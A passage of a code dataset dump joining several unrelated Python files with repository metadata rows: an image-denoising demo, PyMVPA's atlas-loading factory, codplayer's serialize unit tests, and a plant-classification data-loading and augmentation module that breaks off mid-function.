    Each pixel independently becomes 0 (pepper) with probability ``prob``,
    255 (salt) with probability ``prob``, and is copied unchanged otherwise.
    Uses the ``random`` module, so seed it for reproducible output.
    """
    noisy = np.zeros(image.shape, np.uint8)
    salt_threshold = 1 - prob
    rows, cols = image.shape[0], image.shape[1]
    for r in range(rows):
        for c in range(cols):
            draw = random.random()
            if draw < prob:
                noisy[r][c] = 0
            elif draw > salt_threshold:
                noisy[r][c] = 255
            else:
                noisy[r][c] = image[r][c]
    return noisy
def gauss_noise(image, mean=0, var=0.001):
    """Return ``image`` with additive Gaussian noise.

    mean : noise mean; mean = 0 gives white Gaussian noise
    var  : noise variance; larger values blur the image more

    The image is normalised to [0, 1], noise is added, and the result is
    clipped (to [-1, 1] if the noisy signal went negative, else [0, 1] —
    preserving the original clipping choice) and rescaled by 255.  The
    return value is float-typed.
    """
    normalised = np.array(image / 255, dtype=float)
    noise = np.random.normal(mean, var ** 0.5, normalised.shape)
    noisy = normalised + noise
    lower = -1. if noisy.min() < 0 else 0.
    noisy = np.clip(noisy, lower, 1.0)
    return noisy * 255
from PIL import Image
# OpenCV cannot decode GIFs directly, so grab the first frame via
# VideoCapture and hand it to Pillow for the grayscale conversion.
gif = cv2.VideoCapture('img/test3.gif')
ret,frame = gif.read()
img = Image.fromarray(frame)
# L : grayscale image, RGB : RGB color image
img = img.convert('L')
img = np.array(img)
# Build the two noisy test images used by all figures below.
sp_img = sp_noise(img,0.015)
gs_img = gauss_noise(img,var=0.02)
# Neighborhood averaging (box filter)
def fspeical_average(image, kernel):
    """Zero-padded neighborhood-average filter.

    ``kernel`` must be a square array; it is normalised by size**2, so a
    kernel of ones yields the plain box/mean filter.  Returns uint8.
    """
    size = len(kernel)
    normalized = kernel / (size ** 2)
    pad = size // 2
    height, width = image.shape[0], image.shape[1]
    padded = np.zeros((height + 2 * pad, width + 2 * pad))
    padded[pad:pad + height, pad:pad + width] = np.array(image)[0:height, 0:width]
    filtered = np.zeros((height + 2 * pad, width + 2 * pad), np.float32)
    for row in range(pad, pad + height):
        for col in range(pad, pad + width):
            window = padded[row - pad:row + pad + 1, col - pad:col + pad + 1]
            filtered[row, col] = np.sum(normalized * window)
    return np.array(filtered[pad:pad + height, pad:pad + width], np.uint8)
# Median filtering
def fspeical_medium(image, a):
    """Zero-padded median filter with an ``a`` x ``a`` window.  Returns uint8."""
    pad = a // 2
    height, width = image.shape[0], image.shape[1]
    padded = np.zeros((height + 2 * pad, width + 2 * pad))
    padded[pad:pad + height, pad:pad + width] = np.array(image)[0:height, 0:width]
    filtered = np.zeros((height + 2 * pad, width + 2 * pad), np.float32)
    for row in range(pad, pad + height):
        for col in range(pad, pad + width):
            filtered[row, col] = np.median(
                padded[row - pad:row + pad + 1, col - pad:col + pad + 1])
    return np.array(filtered[pad:pad + height, pad:pad + width], np.uint8)
# Figure 1: neighborhood averaging (3x3 and 5x5) on both noise types.
plt.figure()
plt.subplot(2,4,1)
plt.imshow(img,cmap='gray')
plt.title("原图")
plt.subplot(2,4,5)
plt.imshow(img,cmap='gray')
plt.title("原图")
plt.subplot(2,4,2)
plt.imshow(sp_img,cmap='gray')
plt.title("加椒盐噪声")
plt.subplot(2,4,3)
plt.imshow(fspeical_average(sp_img,kernel=np.array([[1,1,1],[1,1,1],[1,1,1]])),cmap='gray')
plt.title("邻域平均法去椒盐噪声(3x3)")
plt.subplot(2,4,4)
plt.imshow(fspeical_average(sp_img,kernel=np.array([[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1]])),cmap='gray')
plt.title("邻域平均法去椒盐噪声(5x5)")
plt.subplot(2,4,6)
plt.imshow(gs_img,cmap='gray')
plt.title("加高斯噪声")
plt.subplot(2,4,7)
plt.imshow(fspeical_average(gs_img,kernel=np.array([[1,1,1],[1,1,1],[1,1,1]])),cmap='gray')
plt.title("邻域平均法去高斯噪声(3x3)")
plt.subplot(2,4,8)
plt.imshow(fspeical_average(gs_img,kernel=np.array([[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1]])),cmap='gray')
plt.title("邻域平均法去高斯噪声(5x5)")
# Figure 2: median filtering — OpenCV's medianBlur for the uint8
# salt-and-pepper image, the local fspeical_medium for the float Gaussian one.
plt.figure()
plt.subplot(2,4,1)
plt.imshow(img,cmap='gray')
plt.title("原图")
plt.subplot(2,4,5)
plt.imshow(img,cmap='gray')
plt.title("原图")
plt.subplot(2,4,2)
plt.imshow(sp_img,cmap='gray')
plt.title("加椒盐噪声")
plt.subplot(2,4,3)
plt.imshow(cv2.medianBlur(sp_img,3),cmap='gray')
plt.title("中值滤波法去椒盐噪声(3x3)")
plt.subplot(2,4,4)
plt.imshow(cv2.medianBlur(sp_img,5),cmap='gray')
plt.title("中值滤波法去椒盐噪声(5x5)")
plt.subplot(2,4,6)
plt.imshow(gs_img,cmap='gray')
plt.title("加高斯噪声")
plt.subplot(2,4,7)
plt.imshow(fspeical_medium(gs_img,3),cmap='gray')
plt.title("中值滤波法去高斯噪声(3x3)")
plt.subplot(2,4,8)
plt.imshow(fspeical_medium(gs_img,5),cmap='gray')
plt.title("中值滤波法去高斯噪声(5x5)")
# for h in range(gs_img.shape[0]):
# for w in range(gs_img.shape[1]):
# if gs_img[h][w]<0:
# gs_img[h][w] = -gs_img[h][w]
# medianBlur only accepts unsigned integer typed elements
# gs_img = np.uint8(gs_img)
# print(gs_img)
# plt.subplot(2,4,7)
# print(sp_img,gs_img)
# plt.imshow(cv2.medianBlur(gs_img,3),cmap='gray')
# plt.title("中值滤波法去高斯噪声(3x3)")
# plt.subplot(2,4,8)
# plt.imshow(cv2.medianBlur(gs_img,5),cmap='gray')
# plt.title("中值滤波法去高斯噪声(5x5)")
plt.show()
| 28.436047 | 127 | 0.618074 |
1dea1511cf1c9b285abb0600be7448d703e83b22 | 4,151 | py | Python | mvpa2/atlases/warehouse.py | mortonne/PyMVPA | 98644c5cd9733edd39fac746ea7cf67398674645 | [
"MIT"
] | null | null | null | mvpa2/atlases/warehouse.py | mortonne/PyMVPA | 98644c5cd9733edd39fac746ea7cf67398674645 | [
"MIT"
] | null | null | null | mvpa2/atlases/warehouse.py | mortonne/PyMVPA | 98644c5cd9733edd39fac746ea7cf67398674645 | [
"MIT"
] | null | null | null | # emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
#
# See COPYING file distributed along with the PyMVPA package for the
# copyright and license terms.
#
### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
"""Collection of the known atlases"""
import os
from mvpa2.base import warning
from mvpa2.atlases.base import *
from mvpa2.atlases.fsl import *
from functools import reduce
__all__ = ["KNOWN_ATLAS_FAMILIES", "KNOWN_ATLASES", "Atlas"]
# family name -> (list of atlas names, path template with %(name)s placeholder)
KNOWN_ATLAS_FAMILIES = {
    "pymvpa": (
        ["talairach", "talairach-dist"],
        r"/usr/share/rumba/atlases/data/%(name)s_atlas.xml",
    ),
    "fsl": (
        [
            "HarvardOxford-Cortical",
            "HarvardOxford-Subcortical",
            "JHU-tracts",
            "Juelich",
            "MNI",
            "Thalamus",
        ],
        r"/usr/share/fsl/data/atlases/%(name)s.xml",
    )
    # XXX make use of FSLDIR
}

# map to go from the name to the path
KNOWN_ATLASES = dict(
    reduce(
        lambda x, y: x + [(yy, y[1]) for yy in y[0]],
        list(KNOWN_ATLAS_FAMILIES.values()),
        [],
    )
)
def Atlas(filename=None, name=None, *args, **kwargs):
    """A convenience factory for the atlases.

    Provide exactly one of ``filename`` (path to an atlas XML file) or
    ``name`` (a key of KNOWN_ATLASES).  The file is first loaded without
    maps to detect its source (PyMVPA vs FSL) and type, then the matching
    concrete atlas class is instantiated with ``*args``/``**kwargs``.
    Raises ValueError on bad argument combinations, IOError for a missing
    named atlas file, and re-raises XMLAtlasException on parse failure.
    """
    if filename is None:
        if name is None:
            raise ValueError(
                "Please provide either path or name of the atlas to be used"
            )
        atlaspath = KNOWN_ATLASES[name]
        filename = atlaspath % ({"name": name})
        if not os.path.exists(filename):
            raise IOError("File %s for atlas %s was not found" % (filename, name))
    else:
        if name is not None:
            raise ValueError("Provide only filename or name")
    try:
        # Just to guestimate what atlas that is
        tempAtlas = XMLBasedAtlas(
            filename=filename, load_maps=False
        )  # , *args, **kwargs)
        version = tempAtlas.version
        atlas_source = None
        # Probe the known atlas families by their version signature.
        for cls in [PyMVPAAtlas, FSLAtlas]:
            if cls._check_version(version):
                atlas_source = cls.source
                break
        if atlas_source is None:
            if __debug__:
                debug("ATL_", "Unknown atlas " + filename)
            return tempAtlas
        # Per-source mapping from the header's type string to a class.
        atlasTypes = {
            "PyMVPA": {"Label": LabelsAtlas, "Reference": ReferencesAtlas},
            "FSL": {
                "Label": FSLLabelsAtlas,
                "Probabalistic": FSLProbabilisticAtlas,
                "Probabilistic": FSLProbabilisticAtlas,
            },
        }[atlas_source]
        atlasType = tempAtlas.header.type.text
        if atlasType in atlasTypes:
            if __debug__:
                debug("ATL_", "Creating %s Atlas" % atlasType)
            return atlasTypes[atlasType](filename=filename, *args, **kwargs)
            # return ReferencesAtlas(filename)
        else:
            # Unknown type: warn and fall back to the generic atlas object.
            warning(
                "Unknown %s type '%s' of atlas in %s."
                " Known are %s"
                % (atlas_source, atlasType, filename, list(atlasTypes.keys())),
                2,
            )
            return tempAtlas
    except XMLAtlasException as e:
        print("File %s is not a valid XML based atlas due to %s" % (filename, repr(e)))
        raise e
if __name__ == "__main__":
    # Ad-hoc smoke test: load a couple of FSL atlases and print lookups.
    from mvpa2.base import verbose

    verbose.level = 10

    for name in [
        #'data/talairach_atlas.xml',
        "/usr/share/fsl/data/atlases/HarvardOxford-Cortical.xml",
        "/usr/share/fsl/data/atlases/HarvardOxford-Subcortical.xml",
    ]:
        atlas = Atlas(name)
        # print isinstance(atlas.atlas, objectify.ObjectifiedElement)
        # print atlas.header.images.imagefile.get('offset')
        # print atlas.label_voxel( (0, -7, 20) )
        # print atlas[ 0, 0, 0 ]
        print(atlas[-63, -12, 22])
        # print atlas[ 0, -7, 20, [1,2,3] ]
        # print atlas[ (0, -7, 20), 1:2 ]
        # print atlas[ (0, -7, 20) ]
        # print atlas[ (0, -7, 20), : ]
        # print atlas.get_labels(0)
fd47c9a972887917f554171af4090d2d4f1fca7e | 5,090 | py | Python | src/codplayer/test/test_serialize.py | petli/codplayer | 172187b91662affd8e89f572c0db9be1c4257627 | [
"MIT"
] | 14 | 2015-04-27T20:40:46.000Z | 2019-02-01T09:22:02.000Z | src/codplayer/test/test_serialize.py | petli/codplayer | 172187b91662affd8e89f572c0db9be1c4257627 | [
"MIT"
] | 10 | 2015-01-05T18:11:28.000Z | 2018-09-03T08:42:50.000Z | src/codplayer/test/test_serialize.py | petli/codplayer | 172187b91662affd8e89f572c0db9be1c4257627 | [
"MIT"
] | 4 | 2017-03-03T16:59:39.000Z | 2019-11-08T11:15:06.000Z | # codplayer - test the serialize module
#
# Copyright 2013 Peter Liljenberg <peter.liljenberg@gmail.com>
#
# Distributed under an MIT license, please see LICENSE in the top dir.
import unittest
import types
from .. import serialize
# Minimal helper classes used as fixtures by the tests below.
class DummyObject(object):
    # Bare attribute container; populate_object() sets attributes on it.
    pass
class FOO(object):
    # Marker class used as an enum member in the enum-mapping tests.
    pass
class BAR(object):
    # Marker class used as an enum member in the enum-mapping tests.
    pass
class Structure(serialize.Serializable):
    # Simple Serializable with one required int attribute; used to exercise
    # nested-structure (de)serialization in the tests below.
    MAPPING = (
        serialize.Attr('number', int),
    )
class TestPopulateObject(unittest.TestCase):
    """Unit tests for serialize.populate_object().

    Covers: required/missing attributes, type coercion and mismatch,
    optional attributes with defaults, unicode handling, enum mapping,
    nested Serializable structures and typed lists.
    """
    def test_missing_attr(self):
        # A required attribute absent from the input dict raises LoadError.
        with self.assertRaises(serialize.LoadError):
            serialize.populate_object(
                { 'foo': 'bar' },
                DummyObject(),
                [serialize.Attr('gazonk', int)]
                )
    def test_incorrect_type(self):
        # A value of the wrong type raises LoadError.
        with self.assertRaises(serialize.LoadError):
            serialize.populate_object(
                { 'foo': 'bar' },
                DummyObject(),
                [serialize.Attr('foo', int)]
                )
    def test_populate(self):
        # Happy path: mapped attributes are set; unmapped keys are ignored.
        obj = DummyObject()
        serialize.populate_object(
            { 'foo': 'bar',
              'gazonk': 17,
              'flag': True,
              'ignored': None,
              },
            obj,
            [serialize.Attr('gazonk', int),
             serialize.Attr('foo', str),
             serialize.Attr('flag', bool)]
            )
        self.assertEqual(obj.foo, 'bar')
        self.assertEqual(obj.gazonk, 17)
        self.assertIs(obj.flag, True)
    def test_optional(self):
        # Optional attributes: missing -> default (None unless given);
        # attr_populated() is True only for values present in the input.
        obj = DummyObject()
        serialize.populate_object(
            { 'foo': 'bar',
              'opt3': None, },
            obj,
            [serialize.Attr('foo', str),
             serialize.Attr('opt1', int, optional = True),
             serialize.Attr('opt2', int, optional = True, default = 17),
             serialize.Attr('opt3', int, optional = True)]
            )
        self.assertEqual(obj.foo, 'bar')
        self.assertTrue(serialize.attr_populated(obj, 'foo'))
        self.assertEqual(obj.opt1, None)
        self.assertFalse(serialize.attr_populated(obj, 'opt1'))
        self.assertEqual(obj.opt2, 17)
        self.assertFalse(serialize.attr_populated(obj, 'opt2'))
        self.assertEqual(obj.opt3, None)
        self.assertTrue(serialize.attr_populated(obj, 'opt3'))
    def test_unicode_to_str(self):
        # A unicode value for a str attribute is converted to str.
        obj = DummyObject()
        serialize.populate_object(
            { 'foo': u'bar' },
            obj,
            [serialize.Attr('foo', str)]
            )
        self.assertTrue(isinstance(obj.foo, str))
        self.assertEqual(obj.foo, 'bar')
    def test_unicode(self):
        # str_unicode attributes preserve non-ASCII characters.
        obj = DummyObject()
        serialize.populate_object(
            { 'foo': u'bar\u20ac' },
            obj,
            [serialize.Attr('foo', serialize.str_unicode)]
            )
        self.assertTrue(isinstance(obj.foo, serialize.str_unicode))
        self.assertEqual(obj.foo, u'bar\u20ac')
    def test_bad_enum(self):
        # A value naming no class in the enum tuple raises LoadError.
        with self.assertRaises(serialize.LoadError):
            serialize.populate_object(
                { 'foo': 'GAZONK' },
                DummyObject(),
                [serialize.Attr('foo', enum = (FOO, BAR))]
                )
    def test_enum(self):
        # Enum values map by class name to the class objects themselves.
        obj = DummyObject()
        serialize.populate_object(
            { 'foo': 'FOO',
              'bar': 'BAR' },
            obj,
            [serialize.Attr('foo', enum = (FOO, BAR)),
             serialize.Attr('bar', enum = (FOO, BAR))]
            )
        self.assertIs(obj.foo, FOO)
        self.assertIs(obj.bar, BAR)
    def test_structure(self):
        # A nested dict is deserialized into a Serializable instance.
        obj = DummyObject()
        serialize.populate_object(
            { 'value': { 'number': 17 } },
            obj,
            [serialize.Attr('value', Structure)]
            )
        self.assertIsInstance(obj.value, Structure)
        self.assertEqual(obj.value.number, 17)
    def test_bad_structure(self):
        # A non-dict where a structure is expected raises LoadError.
        with self.assertRaises(serialize.LoadError):
            serialize.populate_object(
                { 'value': 17 },
                DummyObject(),
                [serialize.Attr('value', Structure)]
                )
    def test_list(self):
        # list_type deserializes a homogeneous list of that element type.
        obj = DummyObject()
        serialize.populate_object(
            { 'values': [17, 42, 39] },
            obj,
            [serialize.Attr('values', list_type = int)]
            )
        self.assertIsInstance(obj.values, list)
        self.assertListEqual(obj.values, [17, 42, 39])
    def test_bad_list(self):
        # A non-list where a list is expected raises LoadError.
        with self.assertRaises(serialize.LoadError):
            serialize.populate_object(
                { 'values': 17 },
                DummyObject(),
                [serialize.Attr('values', list_type = int)]
                )
    def test_bad_list_value(self):
        # A list element of the wrong type raises LoadError.
        with self.assertRaises(serialize.LoadError):
            serialize.populate_object(
                { 'values': ['foo'] },
                DummyObject(),
                [serialize.Attr('values', list_type = int)]
                )
| 26.510417 | 72 | 0.524361 |
9ebf6d1ccc37f6933a805fa7fdf7c7147e44e461 | 14,648 | py | Python | plant_classification/data_utils.py | laramaktub/cookie_plant_classification | 3fba329b19c3599f3f7334d56003927dd05ff42c | [
"MIT"
] | null | null | null | plant_classification/data_utils.py | laramaktub/cookie_plant_classification | 3fba329b19c3599f3f7334d56003927dd05ff42c | [
"MIT"
] | null | null | null | plant_classification/data_utils.py | laramaktub/cookie_plant_classification | 3fba329b19c3599f3f7334d56003927dd05ff42c | [
"MIT"
] | 1 | 2018-11-30T20:07:09.000Z | 2018-11-30T20:07:09.000Z | # -*- coding: utf-8 -*-
"""
Miscellanous functions manage data in image recognition.
network.
Author: Ignacio Heredia
Date: September 2016
"""
import os
import sys
from io import BytesIO
import threading
import Queue
import numpy as np
from PIL import Image, ImageEnhance
import requests
def data_splits(im_dir='/media/ignacio/Datos/plant_net/images_ori', tag=False):
    """
    Load the training and validation arrays from the train.txt and val.txt files.
    Lines of txt files have the following format:
    'relative_path_to_image' 'image_tag'[optional] 'image_label_number'

    The split files are looked up in <repo_root>/data/data_splits relative
    to this module's location. val.txt and tags.txt are optional; their
    presence is detected by listing that directory.

    Parameters
    ----------
    im_dir : str
        Absolute path to the image folder.
    tag : bool
        Presence or absence of tag in txt files.
        NOTE(review): this parameter is never read in the body — tags are
        detected from the presence of tags.txt instead. Confirm it can be
        retired.
    Returns
    -------
    X_train, X_val : array of strs
        First column: Contains 'absolute_path_to_file' to images.
        Second column [optional]: Contains tag of image
    y_train, y_val : array of int32
        Image label number
    metadata : array of strs
        Label names array.
    tags : array of strs, None
        Tags names array for the training images.
    """
    homedir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
    splits_dir = os.path.join(homedir, 'data', 'data_splits')
    print("Loading data...")
    file_list = os.listdir(splits_dir)
    # Metadata labels
    # NOTE(review): delimiter='/n' (slash-n) looks like a typo for '\n' —
    # confirm against the actual synsets.txt format before changing.
    metadata = np.genfromtxt(os.path.join(splits_dir, 'synsets.txt'), dtype='str', delimiter='/n')
    # Training splits
    train = np.genfromtxt(os.path.join(splits_dir, 'train.txt'), dtype='str', delimiter=' ')
    X_train = np.array([os.path.join(im_dir, i) for i in train[:, 0]])
    y_train = train[:, 1].astype(np.int32)
    if 'tags.txt' in file_list:
        tags = np.genfromtxt(os.path.join(splits_dir, 'tags.txt'), dtype='str', delimiter=' ')
        assert len(X_train) == len(tags), 'You must assign a tag to EVERY training image'
    else:
        tags = None
    # Validation splits (optional; absent file means train-only run)
    if 'val.txt' in file_list:
        val = np.genfromtxt(os.path.join(splits_dir, 'val.txt'), dtype='str', delimiter=' ')
        y_val = val[:, -1].astype(np.int32)
        X_val = np.array([os.path.join(im_dir, i) for i in val[:, 0]])
    else:
        print 'Training with no validation data.'
        X_val, y_val = None, None
    return X_train, y_train, X_val, y_val, metadata, tags
def data_augmentation(im_list, mode='standard', tags=None, params=None, im_size=224,
                      filemode='local', mean_RGB=None):
    """
    Perform data augmentation on some image list using PIL.
    Parameters
    ----------
    im_list : array of strings
        Array where the first column is image_path (or image_url). Optionally
        a second column can be the tags of the image.
        Shape (N,) or (N,2)
    tags : array of strings, None
        If existing, you can the manually modify the data_augmentation function
        (by adding an additional condition to the if, like tags[i]=='fruit')
        to choose which transformations are to be performed to each tag.
    params : dict or None
        Mandatory keys:
        - mirror (bool): allow 50% random mirroring.
        - rotation (bool): allow rotation of [0, 90, 180, 270] degrees.
        - stretch ([0,1] float): randomly stretch image.
        - crop ([0,1] float): randomly take an image crop.
        - zoom ([0,1] float): random zoom applied to crop_size.
            --> Therefore the effective crop size at each iteration will be a
            random number between 1 and crop*(1-zoom). For example:
             * crop=1, zoom=0: no crop of the image
             * crop=1, zoom=0.1: random crop of random size between 100% image and 90% of the image
             * crop=0.9, zoom=0.1: random crop of random size between 90% image and 80% of the image
             * crop=0.9, zoom=0: random crop of always 90% of the image
             Image size refers to the size of the shortest side.
        - pixel_noise (bool): allow different pixel transformations like gaussian noise,
          brightness, color jittering, contrast and sharpness modification.
    mode : {'standard', 'minimal', 'test', None}
        We overwrite the params dict with some defaults augmentation parameters
        - 'minimal': no data augmentation, just resizing
        - 'standard': tipical parameters for data augmentation during training
        - 'test': minimized data augmentation for validation/testing
        - None: we do not overwrite the params dict variable
    im_size : int
        Final image size to feed the net's input (eg. 224 for Resnet).
    filemode : {'local','url'}
        - 'local': filename is absolute path in local disk.
        - 'url': filename is internet url.
    mean_RGB : array, None
        Mean RGB values for your dataset. If not provided, we use some default values.
    Returns
    -------
    Array of shape (N,3,im_size,im_size) containing the augmented images.
    """
    if mean_RGB is None:
        # Default mean RGB (matches the plantnet values quoted in meanRGB below).
        mean_RGB = np.array([107.59348955, 112.1047813, 80.9982362])
    else:
        mean_RGB = np.array(mean_RGB)
    # A non-None `mode` overrides any caller-supplied `params`.
    if mode == 'minimal':
        params = {'mirror':False, 'rotation':False, 'stretch':False, 'crop':False, 'pixel_noise':False}
    if mode == 'standard':
        params = {'mirror':True, 'rotation':True, 'stretch':0.3, 'crop':1., 'zoom':0.3, 'pixel_noise':False}
    if mode == 'test':
        params = {'mirror':True, 'rotation':True, 'stretch':0.1, 'crop':.9, 'zoom':0.1, 'pixel_noise':False}
    batch = []
    for i, filename in enumerate(im_list):
        if filemode == 'local':
            im = Image.open(filename)
            im = im.convert('RGB')
        elif filemode == 'url':
            filename = BytesIO(requests.get(filename).content)
            im = Image.open(filename)
            im = im.convert('RGB')
        if params['stretch']:
            # Independent random scale factor per axis in [1-s/2, 1+s/2].
            stretch = params['stretch']
            stretch_factor = np.random.uniform(low=1.-stretch/2, high=1.+stretch/2, size=2)
            im = im.resize((im.size * stretch_factor).astype(int))
        if params['crop']:
            effective_zoom = np.random.rand() * params['zoom']
            crop = params['crop'] - effective_zoom
            # NOTE(review): PIL's Image.size is (width, height); the names
            # suggest (y, x) are swapped here. Harmless for this square crop
            # (it uses min of both), but confirm before reusing elsewhere.
            ly, lx = im.size
            crop_size = crop * min([ly, lx])
            rand_x = np.random.randint(low=0, high=lx-crop_size + 1)
            rand_y = np.random.randint(low=0, high=ly-crop_size + 1)
            min_yx = np.array([rand_y, rand_x])
            max_yx = min_yx + crop_size #square crop
            im = im.crop(np.concatenate((min_yx, max_yx)))
        if params['mirror']:
            # Each flip applied independently with probability 0.5.
            if np.random.random() > 0.5:
                im = im.transpose(Image.FLIP_LEFT_RIGHT)
            if np.random.random() > 0.5:
                im = im.transpose(Image.FLIP_TOP_BOTTOM)
        if params['rotation']:
            rot = np.random.choice([0, 90, 180, 270])
            if rot == 90:
                im = im.transpose(Image.ROTATE_90)
            if rot == 180:
                im = im.transpose(Image.ROTATE_180)
            if rot == 270:
                im = im.transpose(Image.ROTATE_270)
        if params['pixel_noise']:
            #not used by default as it does not seem to improve much the performance,
            #but more than DOUBLES the data augmentation processing time.
            # Color
            color_factor = np.random.normal(1, 0.3) #1: original
            color_factor = np.clip(color_factor, 0., 2.)
            im = ImageEnhance.Color(im).enhance(color_factor)
            # Brightness
            brightness_factor = np.random.normal(1, 0.2) #1: original
            brightness_factor = np.clip(brightness_factor, 0.5, 1.5)
            im = ImageEnhance.Brightness(im).enhance(brightness_factor)
            # Contrast
            contrast_factor = np.random.normal(1, 0.2) #1: original
            contrast_factor = np.clip(contrast_factor, 0.5, 1.5)
            im = ImageEnhance.Contrast(im).enhance(contrast_factor)
            # Sharpness
            sharpness_factor = np.random.normal(1, 0.4) #1: original
            sharpness_factor = np.clip(sharpness_factor, 0., 1.)
            im = ImageEnhance.Sharpness(im).enhance(sharpness_factor)
            # # Gaussian Noise #severely deteriorates learning
            # im = np.array(im)
            # noise = np.random.normal(0, 15, im.shape)
            # noisy_image = np.clip(im + noise, 0, 255).astype(np.uint8)
            # im = Image.fromarray(noisy_image)
        im = im.resize((im_size, im_size))
        batch.append(np.array(im)) # shape (N, 224, 224, 3)
    batch = np.array(batch) - mean_RGB[None, None, None, :] # mean centering
    batch = batch.transpose(0, 3, 1, 2) # shape(N, 3, 224, 224)
    batch = batch[:, ::-1, :, :] # switch from RGB to BGR
    return batch.astype(np.float32)
#def iterate_minibatches(inputs, targets, batchsize, shuffle=False):
# """
# Returns generator of batches of inputs and targets.
# """
# assert len(inputs) == len(targets)
# assert len(inputs) >= batchsize
# if shuffle:
# indices = np.arange(len(inputs))
# np.random.shuffle(indices)
# for start_idx in range(0, len(inputs) - batchsize + 1, batchsize):
# if shuffle:
# excerpt = indices[start_idx:start_idx + batchsize]
# else:
# excerpt = slice(start_idx, start_idx + batchsize)
# if targets.shape < 2: targets = targets.reshape(-1,1)
# yield inputs[excerpt], targets[excerpt]
def buffered_gen_threaded(source_gen, buffer_size=2):
    """
    Generator that runs a slow source generator in a separate thread. Beware of the GIL!
    buffer_size: the maximal number of items to pre-generate (length of the buffer)
    Author: Benanne (github-kaggle/benanne/ndsb)

    Fixes over the original version:
    - a unique sentinel object is used instead of None, so the source may
      legitimately yield None values;
    - an exception raised by the source generator is forwarded to the
      consumer instead of silently killing the producer thread (which
      previously left the consumer blocked forever on an empty queue).
    """
    if buffer_size < 2:
        raise RuntimeError("Minimal buffer size is 2!")
    # the effective buffer size is one less, because the generation process
    # will generate one extra element and block until there is room in the buffer.
    buffer = Queue.Queue(maxsize=buffer_size - 1)
    _end = object()  # unique end-of-stream marker, cannot collide with data

    def _buffered_generation_thread(source_gen, buffer):
        try:
            for data in source_gen:
                buffer.put(data, block=True)
        except Exception as exc:
            # Hand the failure to the consumer so it re-raises there.
            buffer.put((_end, exc))
        else:
            buffer.put((_end, None))  # signal normal end of the iterator

    thread = threading.Thread(target=_buffered_generation_thread, args=(source_gen, buffer))
    thread.daemon = True
    thread.start()

    while True:
        item = buffer.get()
        # End marker is a 2-tuple whose first element is our private object;
        # user data can never contain _end, so this test is unambiguous.
        if isinstance(item, tuple) and len(item) == 2 and item[0] is _end:
            if item[1] is not None:
                raise item[1]
            return
        yield item
def iterate_minibatches(inputs, targets, batchsize, shuffle=False, **augmentation_params):
    """
    Return a buffered generator of (X, y) minibatches.

    Data augmentation for the next batch runs on the CPU (in a background
    thread, via buffered_gen_threaded) while the GPU computes the current
    batch.

    Parameters
    ----------
    inputs : array of image paths/urls, shape (N,) or (N,2)
    targets : array of labels, shape (N,) or (N,1)
    batchsize : int
        Trailing samples that do not fill a complete batch are dropped.
    shuffle : bool
        If True, iterate the samples in a random order.
    augmentation_params :
        Forwarded verbatim to data_augmentation().
    """
    assert len(inputs) == len(targets)
    assert len(inputs) >= batchsize
    if shuffle:
        indices = np.arange(len(inputs))
        np.random.shuffle(indices)
    # Ensure targets is 2-D (N, 1).
    # BUGFIX: the original test was `targets.shape < 2`, which compares a
    # tuple against an int (always False on Python 2) and so never fired;
    # the commented-out sibling above shows the intent was a rank check.
    if len(targets.shape) < 2:
        targets = targets.reshape(-1, 1)
    def gen(inputs, targets, batchsize, **augmentation_params):
        for start_idx in range(0, len(inputs) - batchsize + 1, batchsize):
            if shuffle:
                excerpt = indices[start_idx:start_idx + batchsize]
            else:
                excerpt = slice(start_idx, start_idx + batchsize)
            # Augmentation happens here, inside the producer thread.
            X = data_augmentation(inputs[excerpt], **augmentation_params)
            y = targets[excerpt]
            yield X, y
    return buffered_gen_threaded(gen(inputs, targets, batchsize, **augmentation_params))
def standard_tencrop_batch(filename, filemode='local', crop_prop=0.8, im_size=224):
    """
    Returns an ordered ten crop batch of images from an original image (corners,
    center + mirrors).
    Parameters
    ----------
    filename : str
        Image path
    crop_prop : float
        Size of the crop with respect to the original image.
    im_size : int
        Size of the output image to feed the net.
    filemode : {'local','url'}
        * 'local' -- filename is absolute path in local disk.
        * 'url' -- filename is internet url.
    Returns
    -------
    Array of shape (10,3,im_size,im_size) containing the augmented images.
    """
    batch = []
    # Hard-coded dataset mean (same values as the data_augmentation default).
    mean_RGB = np.array([107.59348955, 112.1047813, 80.9982362])
    if filemode == 'local':
        im = Image.open(filename)
    elif filemode == 'url':
        filename = BytesIO(requests.get(filename).content)
        im = Image.open(filename)
    im = im.convert('RGB')
    # Squash the image to a square of side = shortest original side.
    min_side = min(im.size)
    im = im.resize((min_side, min_side)) # resize to shorter border
    h, w = min_side, min_side # height, width (square)
    crop_size = int(crop_prop * min_side)
    # Crops: four corners plus center
    c1 = im.crop((0, 0, crop_size, crop_size)) # top-left
    c2 = im.crop((0, h-crop_size, crop_size, h)) # bottom-left
    c3 = im.crop((w-crop_size, 0, w, crop_size)) # top-right
    c4 = im.crop((w-crop_size, h-crop_size, w, h)) # bottom-right
    # NB: the /2 below is integer division under Python 2 since the
    # operands are ints — coordinates are whole pixels.
    c5 = im.crop(((w-crop_size)/2, (h-crop_size)/2,
                  (w+crop_size)/2, (h+crop_size)/2)) # center
    # Save crop and its mirror (5 crops x 2 = 10 images, in this order)
    for image in [c1, c2, c3, c4, c5]:
        image = image.resize((im_size, im_size))
        batch.append(np.array(image))
        batch.append(np.array(image.transpose(Image.FLIP_LEFT_RIGHT)))
    batch = (np.array(batch) - mean_RGB) # mean centering
    batch = batch.transpose(0, 3, 1, 2) # shape(10, 3, 224, 224)
    batch = batch[:, ::-1, :, :] # switch from RGB to BGR
    return batch.astype(np.float32)
def meanRGB(im_list, verbose=False):
    """
    Returns the mean and std RGB values for the whole dataset.
    For example in the plantnet dataset we have:
    mean_RGB = np.array([ 107.59348955, 112.1047813 , 80.9982362 ])
    std_RGB = np.array([ 52.78326119, 50.56163087, 50.86486131])

    NB: the returned std is the average of the per-image stds, not the std
    of the pooled pixel distribution (each image contributes equally
    regardless of its pixel count).

    Parameters
    ----------
    im_list : array of strings
        Array where the first column is image_path (or image_url). Shape (N,).
    verbose : bool
        If True, print a textual completion bar while iterating.
    """
